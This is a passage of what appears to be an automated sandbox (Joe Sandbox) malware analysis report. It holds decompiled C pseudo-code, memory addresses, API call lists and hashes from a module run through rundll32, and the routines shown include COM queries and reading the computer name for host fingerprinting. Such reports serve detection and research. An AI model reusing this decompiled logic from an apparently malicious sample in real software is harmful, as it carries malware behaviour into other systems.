                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memset$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 1529149438-0
                                • Opcode ID: 4f259fa0e7bddc46db1a56de9729668580b829f0d33b402927a24f61d396d10f
                                • Instruction ID: 2eed2513cdf68aeb89f5fcbabbe5794edc3421fc2d35c4079fa938d8aa2d770c
                                • Opcode Fuzzy Hash: 4f259fa0e7bddc46db1a56de9729668580b829f0d33b402927a24f61d396d10f
                                • Instruction Fuzzy Hash: 8F213D71A00629ABDB11AF69CC50FEEBFBCEF58640F048055F944A7250E735DA01CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E01061F7A(intOrPtr _a4) {
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				char _v32;
                                				intOrPtr _v40;
                                				void* _v46;
                                				short _v48;
                                				intOrPtr _t49;
                                				void* _t51;
                                				intOrPtr* _t53;
                                				intOrPtr _t56;
                                				void* _t58;
                                				intOrPtr* _t59;
                                				intOrPtr* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				short _t73;
                                				intOrPtr* _t74;
                                				intOrPtr _t77;
                                				intOrPtr* _t80;
                                				intOrPtr _t82;
                                				char* _t98;
                                				intOrPtr _t100;
                                				void* _t106;
                                				void* _t108;
                                				intOrPtr _t112;
                                
                                				_v48 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t49 =  *0x106a348; // 0x409d5a8
                                				_t4 = _t49 + 0x106b448; // 0x51089f0
                                				_t82 = 0;
                                				_t5 = _t49 + 0x106b438; // 0x9ba05972
                                				_t51 =  *0x106a170(_t5, 0, 4, _t4,  &_v20); // executed
                                				_t106 = _t51;
                                				if(_t106 >= 0) {
                                					_t53 = _v20;
                                					_push( &_v12);
                                					_push(1);
                                					_push( &_v32);
                                					_push(8);
                                					_t98 =  &_v48;
                                					_push(_t98);
                                					_push(_t98);
                                					_push(_t53); // executed
                                					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                                						_t56 =  *0x106a348; // 0x409d5a8
                                						_t30 = _t56 + 0x106b428; // 0x51089d0
                                						_t31 = _t56 + 0x106b458; // 0x4c96be40
                                						_t58 =  *0x106a10c(_v12, _t31, _t30,  &_v24); // executed
                                						_t106 = _t58;
                                						_t59 = _v12;
                                						 *((intOrPtr*)( *_t59 + 8))(_t59);
                                						goto L11;
                                					} else {
                                						_t71 = _v20;
                                						_v16 = 0;
                                						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                                						if(_t106 >= 0) {
                                							_t112 = _v16;
                                							if(_t112 == 0) {
                                								_t106 = 0x80004005;
                                								goto L11;
                                							} else {
                                								if(_t112 <= 0) {
                                									L11:
                                									if(_t106 >= 0) {
                                										goto L12;
                                									}
                                								} else {
                                									do {
                                										_t73 = 3;
                                										_v48 = _t73;
                                										_t74 = _v20;
                                										_v40 = _t82;
                                										_t108 = _t108 - 0x10;
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										asm("movsd");
                                										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                                										if(_t106 < 0) {
                                											goto L7;
                                										} else {
                                											_t77 =  *0x106a348; // 0x409d5a8
                                											_t23 = _t77 + 0x106b428; // 0x51089d0
                                											_t24 = _t77 + 0x106b458; // 0x4c96be40
                                											_t106 =  *0x106a10c(_v12, _t24, _t23,  &_v24);
                                											_t80 = _v12;
                                											 *((intOrPtr*)( *_t80 + 8))(_t80);
                                											if(_t106 >= 0) {
                                												L12:
                                												_t63 = _v24;
                                												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                                												if(_t106 >= 0) {
                                													_t100 =  *0x106a348; // 0x409d5a8
                                													_t67 = _v28;
                                													_t40 = _t100 + 0x106b418; // 0x214e3
                                													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                                													_t69 = _v28;
                                													 *((intOrPtr*)( *_t69 + 8))(_t69);
                                												}
                                												_t65 = _v24;
                                												 *((intOrPtr*)( *_t65 + 8))(_t65);
                                											} else {
                                												goto L7;
                                											}
                                										}
                                										goto L15;
                                										L7:
                                										_t82 = _t82 + 1;
                                									} while (_t82 < _v16);
                                									goto L11;
                                								}
                                							}
                                						}
                                					}
                                					L15:
                                					_t61 = _v20;
                                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                                				}
                                				return _t106;
                                			}


































                                0x01061f85
                                0x01061f8c
                                0x01061f8d
                                0x01061f8e
                                0x01061f8f
                                0x01061f95
                                0x01061f9a
                                0x01061fa3
                                0x01061fa6
                                0x01061fad
                                0x01061fb3
                                0x01061fb7
                                0x01061fbd
                                0x01061fc5
                                0x01061fc6
                                0x01061fcb
                                0x01061fcc
                                0x01061fce
                                0x01061fd1
                                0x01061fd2
                                0x01061fd3
                                0x01061fd9
                                0x0106206f
                                0x01062074
                                0x0106207b
                                0x01062085
                                0x0106208b
                                0x0106208d
                                0x01062093
                                0x00000000
                                0x01061fdf
                                0x01061fdf
                                0x01061fe6
                                0x01061fef
                                0x01061ff3
                                0x01061ff9
                                0x01061ffc
                                0x01062064
                                0x00000000
                                0x01061ffe
                                0x01061ffe
                                0x01062096
                                0x01062098
                                0x00000000
                                0x00000000
                                0x01062004
                                0x01062004
                                0x01062006
                                0x0106200b
                                0x0106200f
                                0x01062012
                                0x01062017
                                0x0106201f
                                0x01062020
                                0x01062021
                                0x01062023
                                0x01062027
                                0x0106202b
                                0x00000000
                                0x0106202d
                                0x01062031
                                0x01062036
                                0x0106203d
                                0x0106204d
                                0x0106204f
                                0x01062055
                                0x0106205a
                                0x0106209a
                                0x0106209a
                                0x010620a7
                                0x010620ab
                                0x010620b0
                                0x010620b6
                                0x010620bb
                                0x010620c5
                                0x010620c7
                                0x010620cd
                                0x010620cd
                                0x010620d0
                                0x010620d6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0106205a
                                0x00000000
                                0x0106205c
                                0x0106205c
                                0x0106205d
                                0x00000000
                                0x01062062
                                0x01061ffe
                                0x01061ffc
                                0x01061ff3
                                0x010620d9
                                0x010620d9
                                0x010620df
                                0x010620df
                                0x010620e8

                                APIs
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051089D0,01063F35,?,?,?,?,?,?,?,?,?,?,?,01063F35), ref: 01062047
                                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051089D0,01063F35,?,?,?,?,?,?,?,01063F35,00000000,00000000,00000000,006D0063), ref: 01062085
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: QueryServiceUnknown_
                                • String ID:
                                • API String ID: 2042360610-0
                                • Opcode ID: 477699afa5fdc2b0da15c477e4d8ae740458d88c2f24915ca5af92e1d576dba3
                                • Instruction ID: 61ad38ac08ae0b4a0bac55382c2f7925b2d009966d10b1cd3a849787301b51a0
                                • Opcode Fuzzy Hash: 477699afa5fdc2b0da15c477e4d8ae740458d88c2f24915ca5af92e1d576dba3
                                • Instruction Fuzzy Hash: 4A511E75E00219EFDB10DFE8C888DEEB7B9FF48710B048559FA45EB211DA71A945CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E010646CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                				void* _v8;
                                				void* __esi;
                                				intOrPtr* _t35;
                                				void* _t40;
                                				intOrPtr* _t41;
                                				intOrPtr* _t43;
                                				intOrPtr* _t45;
                                				intOrPtr* _t50;
                                				intOrPtr* _t52;
                                				void* _t54;
                                				intOrPtr* _t55;
                                				intOrPtr* _t57;
                                				intOrPtr* _t61;
                                				intOrPtr* _t65;
                                				intOrPtr _t68;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                
                                				_t55 = _a4;
                                				_t35 =  *((intOrPtr*)(_t55 + 4));
                                				_a4 = 0;
                                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                				if(_t76 < 0) {
                                					L18:
                                					return _t76;
                                				}
                                				_t40 = E010674FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                				_t76 = _t40;
                                				if(_t76 >= 0) {
                                					_t61 = _a28;
                                					if(_t61 != 0 &&  *_t61 != 0) {
                                						_t52 = _v8;
                                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                					}
                                					if(_t76 >= 0) {
                                						_t43 =  *_t55;
                                						_t68 =  *0x106a348; // 0x409d5a8
                                						_t20 = _t68 + 0x106b1fc; // 0x740053
                                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                						if(_t76 >= 0) {
                                							_t76 = E010665D1(_a4);
                                							if(_t76 >= 0) {
                                								_t65 = _a28;
                                								if(_t65 != 0 &&  *_t65 == 0) {
                                									_t50 = _a4;
                                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                								}
                                							}
                                						}
                                						_t45 = _a4;
                                						if(_t45 != 0) {
                                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                						}
                                						_t57 = __imp__#6;
                                						if(_a20 != 0) {
                                							 *_t57(_a20);
                                						}
                                						if(_a12 != 0) {
                                							 *_t57(_a12);
                                						}
                                					}
                                				}
                                				_t41 = _v8;
                                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                				goto L18;
                                			}





















                                0x010646d1
                                0x010646d4
                                0x010646e4
                                0x010646ed
                                0x010646f1
                                0x010647bf
                                0x010647c5
                                0x010647c5
                                0x0106470b
                                0x01064710
                                0x01064714
                                0x0106471a
                                0x0106471f
                                0x01064726
                                0x01064735
                                0x01064735
                                0x01064739
                                0x0106473b
                                0x01064747
                                0x01064752
                                0x0106475d
                                0x01064761
                                0x0106476b
                                0x0106476f
                                0x01064771
                                0x01064776
                                0x0106477d
                                0x0106478d
                                0x0106478d
                                0x01064776
                                0x0106476f
                                0x0106478f
                                0x01064794
                                0x01064799
                                0x01064799
                                0x0106479c
                                0x010647a5
                                0x010647aa
                                0x010647aa
                                0x010647af
                                0x010647b4
                                0x010647b4
                                0x010647af
                                0x01064739
                                0x010647b6
                                0x010647bc
                                0x00000000

                                APIs
                                  • Part of subcall function 010674FE: SysAllocString.OLEAUT32(80000002), ref: 0106755B
                                  • Part of subcall function 010674FE: SysFreeString.OLEAUT32(00000000), ref: 010675C1
                                • SysFreeString.OLEAUT32(?), ref: 010647AA
                                • SysFreeString.OLEAUT32(01063520), ref: 010647B4
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 9a08556141288a4a9fab422ad8f0bf8996c89c59808080ca038f5745d9986a08
                                • Instruction ID: fe5087b4a3c85887fc9f80dd563e2cb6121ac40b3f45ceed50af01bdc4abbd03
                                • Opcode Fuzzy Hash: 9a08556141288a4a9fab422ad8f0bf8996c89c59808080ca038f5745d9986a08
                                • Instruction Fuzzy Hash: E6311B75500159EFCB21EF98C888C9BBBBEFFCA7407244698F945DB210D6359D51CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E01065634(intOrPtr* __eax, intOrPtr _a4) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr* _t22;
                                				void* _t23;
                                				intOrPtr* _t24;
                                				intOrPtr* _t26;
                                				intOrPtr* _t28;
                                				intOrPtr* _t30;
                                				void* _t31;
                                				intOrPtr* _t32;
                                				intOrPtr _t42;
                                				intOrPtr _t45;
                                				intOrPtr _t48;
                                				void* _t51;
                                
                                				_push( &_v16);
                                				_t42 =  *0x106a348; // 0x409d5a8
                                				_t2 = _t42 + 0x106b468; // 0x20400
                                				_push(0);
                                				_push(__eax);
                                				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                				if(_t51 >= 0) {
                                					_t22 = _v16;
                                					_t45 =  *0x106a348; // 0x409d5a8
                                					_t6 = _t45 + 0x106b488; // 0xe7a1af80
                                					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                					_t51 = _t23;
                                					if(_t51 >= 0) {
                                						_t26 = _v12;
                                						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                						if(_t51 >= 0) {
                                							_t48 =  *0x106a348; // 0x409d5a8
                                							_t30 = _v8;
                                							_t12 = _t48 + 0x106b478; // 0xa4c6892c
                                							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                							_t51 = _t31;
                                							_t32 = _v8;
                                							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                						}
                                						_t28 = _v12;
                                						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                					}
                                					_t24 = _v16;
                                					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                				}
                                				return _t51;
                                			}


















                                0x01065640
                                0x01065641
                                0x01065647
                                0x0106564e
                                0x01065650
                                0x01065654
                                0x01065658
                                0x0106565a
                                0x01065663
                                0x01065669
                                0x01065671
                                0x01065673
                                0x01065677
                                0x01065679
                                0x01065686
                                0x0106568a
                                0x0106568f
                                0x01065695
                                0x0106569a
                                0x010656a2
                                0x010656a4
                                0x010656a6
                                0x010656ac
                                0x010656ac
                                0x010656af
                                0x010656b5
                                0x010656b5
                                0x010656b8
                                0x010656be
                                0x010656be
                                0x010656c5

                                APIs
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01065671
                                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010656A2
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Interface_ProxyQueryUnknown_
                                • String ID:
                                • API String ID: 2522245112-0
                                • Opcode ID: e1bda73074a7d24afffaccaac6b420086fa3fce6922890f65cd5a437179c0009
                                • Instruction ID: 58806a9fbdfac28f9cb20c15d941b67f49be38209657f72cc9b1d9a3fb30eea6
                                • Opcode Fuzzy Hash: e1bda73074a7d24afffaccaac6b420086fa3fce6922890f65cd5a437179c0009
                                • Instruction Fuzzy Hash: D6211F75A0061AEFCB00DFA4C888D9AB779EF8D714B148694F945EB324DB71ED41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 01061267
                                  • Part of subcall function 010646CB: SysFreeString.OLEAUT32(?), ref: 010647AA
                                • SafeArrayDestroy.OLEAUT32(?), ref: 010612B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: ArraySafe$CreateDestroyFreeString
                                • String ID:
                                • API String ID: 3098518882-0
                                • Opcode ID: 612f28965a74f1392842bba08493d30965b56ac44b2ad9553397d504fdc54575
                                • Instruction ID: 7e5aca70746f8c2b157aa367704cbe71f44e42749a4bfd374b37e1f154b35fde
                                • Opcode Fuzzy Hash: 612f28965a74f1392842bba08493d30965b56ac44b2ad9553397d504fdc54575
                                • Instruction Fuzzy Hash: 6B116175A0020ABFDB01DFE8C804EEEBBB9EF48710F008025FA44E7160E7759A15CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010641FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                				struct _FILETIME _v12;
                                				signed int _t11;
                                				void* _t16;
                                				short _t19;
                                				void* _t22;
                                				void* _t24;
                                				void* _t25;
                                				short* _t26;
                                
                                				_t24 = __edx;
                                				_t25 = E010661FC(_t11, _a12);
                                				if(_t25 == 0) {
                                					_t22 = 8;
                                				} else {
                                					_t26 = _t25 + _a16 * 2;
                                					 *_t26 = 0; // executed
                                					_t16 = E01062AE4(__ecx, _a4, _a8, _t25); // executed
                                					_t22 = _t16;
                                					if(_t22 == 0) {
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t19 = 0x5f;
                                						 *_t26 = _t19;
                                						_t22 = E01064822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                					}
                                					HeapFree( *0x106a2d8, 0, _t25);
                                				}
                                				return _t22;
                                			}











                                0x010641fa
                                0x0106420b
                                0x0106420f
                                0x0106426a
                                0x01064211
                                0x01064218
                                0x01064220
                                0x01064223
                                0x01064228
                                0x0106422c
                                0x01064232
                                0x0106423a
                                0x0106423d
                                0x01064255
                                0x01064255
                                0x01064260
                                0x01064260
                                0x01064271

                                APIs
                                  • Part of subcall function 010661FC: lstrlen.KERNEL32(?,00000000,05109D70,00000000,010639E8,05109F93,69B25F44,?,?,?,?,69B25F44,00000005,0106A00C,4D283A53,?), ref: 01066203
                                  • Part of subcall function 010661FC: mbstowcs.NTDLL ref: 0106622C
                                  • Part of subcall function 010661FC: memset.NTDLL ref: 0106623E
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,051093F4), ref: 01064232
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,76D85520,00000008,00000014,004F0053,051093F4), ref: 01064260
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID:
                                • API String ID: 1500278894-0
                                • Opcode ID: 47e40b63c9b488be8ef3302c4da83ab7e2d147d4ff82cbb1eef4977613a7fd67
                                • Instruction ID: d33d2b336a6254ab9e81b7320ed1036d016045cbb889760d8814645ffbb22559
                                • Opcode Fuzzy Hash: 47e40b63c9b488be8ef3302c4da83ab7e2d147d4ff82cbb1eef4977613a7fd67
                                • Instruction Fuzzy Hash: AF017C3221024ABFEB216FA89C44E9F3BBCFF85714F50402AFA809A161DAB2D954D750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(01067283), ref: 0106150A
                                  • Part of subcall function 010646CB: SysFreeString.OLEAUT32(?), ref: 010647AA
                                • SysFreeString.OLEAUT32(00000000), ref: 0106154B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloc
                                • String ID:
                                • API String ID: 986138563-0
                                • Opcode ID: 6b134d8bc8c0170c8dc09dc768be51fa8b80acb7ad7d41903a56cfdb5a9786d8
                                • Instruction ID: c0934c6edf7a4436ac756783d7313f387d3bd426b8645f962847b3a7eeb6b925
                                • Opcode Fuzzy Hash: 6b134d8bc8c0170c8dc09dc768be51fa8b80acb7ad7d41903a56cfdb5a9786d8
                                • Instruction Fuzzy Hash: BA01627560011AFFDF519FA8D904DEF7BB9EF48610B044021F949E7120D6319A19CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E010622D7(void* __ecx) {
                                				signed int _v8;
                                				void* _t15;
                                				void* _t19;
                                				void* _t20;
                                				void* _t22;
                                				intOrPtr* _t23;
                                
                                				_t23 = __imp__;
                                				_t20 = 0;
                                				_v8 = _v8 & 0;
                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                				_t10 = _v8;
                                				if(_v8 != 0) {
                                					_t20 = E01066D63(_t10 + 1);
                                					if(_t20 != 0) {
                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                						if(_t15 != 0) {
                                							 *((char*)(_v8 + _t20)) = 0;
                                						} else {
                                							E01066C2C(_t20);
                                							_t20 = 0;
                                						}
                                					}
                                				}
                                				return _t20;
                                			}









                                0x010622dc
                                0x010622e7
                                0x010622e9
                                0x010622ef
                                0x010622f1
                                0x010622f6
                                0x010622ff
                                0x01062303
                                0x0106230c
                                0x01062310
                                0x0106231f
                                0x01062312
                                0x01062313
                                0x01062318
                                0x01062318
                                0x01062310
                                0x01062303
                                0x01062328

                                APIs
                                • GetComputerNameExA.KERNEL32(00000003,00000000,010657B5,00000000,00000000,?,7477C740,010657B5), ref: 010622EF
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • GetComputerNameExA.KERNEL32(00000003,00000000,010657B5,010657B6,?,7477C740,010657B5), ref: 0106230C
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: ComputerHeapName$AllocateFree
                                • String ID:
                                • API String ID: 187446995-0
                                • Opcode ID: 55ec10cb85db629b587b7adee1ee9bd8b29289a9e5b676c4c09c81a414a0f93e
                                • Instruction ID: dd3ba6a31cb6be37484b4dcdde11baa38447d4a6fcab5fb609733533559b62a1
                                • Opcode Fuzzy Hash: 55ec10cb85db629b587b7adee1ee9bd8b29289a9e5b676c4c09c81a414a0f93e
                                • Instruction Fuzzy Hash: 83F05436A00119FAE721D6A98C00FEF7AFCDBD5650F1100A5E984D3145EAB1DF018771
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010678BF(WCHAR* _a4) {
                                				void* __edi;
                                				intOrPtr _t11;
                                				intOrPtr _t14;
                                				void* _t16;
                                				void* _t18;
                                				WCHAR* _t20;
                                
                                				_t20 = E01066D63(lstrlenW(_a4) + _t7 + 0x5c);
                                				if(_t20 == 0) {
                                					_t18 = 8;
                                				} else {
                                					_t11 =  *0x106a348; // 0x409d5a8
                                					_t5 = _t11 + 0x106ba70; // 0x43002f
                                					wsprintfW(_t20, _t5, 5, _a4);
                                					_t14 =  *0x106a348; // 0x409d5a8
                                					_t6 = _t14 + 0x106b900; // 0x6d0063
                                					_t16 = E01067928(0, _t6, _t20, 0); // executed
                                					_t18 = _t16;
                                					E01066C2C(_t20);
                                				}
                                				return _t18;
                                			}









                                0x010678d5
                                0x010678d9
                                0x01067919
                                0x010678db
                                0x010678df
                                0x010678e6
                                0x010678ee
                                0x010678f4
                                0x010678ff
                                0x01067908
                                0x0106790e
                                0x01067910
                                0x01067910
                                0x0106791e

                                APIs
                                • lstrlenW.KERNEL32(76DDF710,00000000,?,010671A6,00000000,?,76DDF710,00000000,76DDF730), ref: 010678C5
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • wsprintfW.USER32 ref: 010678EE
                                  • Part of subcall function 01067928: memset.NTDLL ref: 0106794B
                                  • Part of subcall function 01067928: GetLastError.KERNEL32 ref: 01067997
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                • String ID:
                                • API String ID: 1672627171-0
                                • Opcode ID: 3f65df326a374a7f25e4ca41bd66a0a56db151b435d1d72dcf4f0daafc4eaaca
                                • Instruction ID: 004e90574549fcacf0da9ee1b5377c263090da5bca98f9af63506fd8e82d3024
                                • Opcode Fuzzy Hash: 3f65df326a374a7f25e4ca41bd66a0a56db151b435d1d72dcf4f0daafc4eaaca
                                • Instruction Fuzzy Hash: 94F0B432601615EFD720AB28DC08EAA37DCEF94615F058422F684D7125CA76991587B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01061CD6(signed int __edx, intOrPtr _a4) {
                                				void* _t3;
                                				void* _t5;
                                				void* _t7;
                                				void* _t8;
                                				void* _t9;
                                				signed int _t10;
                                
                                				_t10 = __edx;
                                				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x106a2d8 = _t3;
                                				if(_t3 == 0) {
                                					_t8 = 8;
                                					return _t8;
                                				}
                                				 *0x106a1c8 = GetTickCount();
                                				_t5 = E01066D78(_a4);
                                				if(_t5 == 0) {
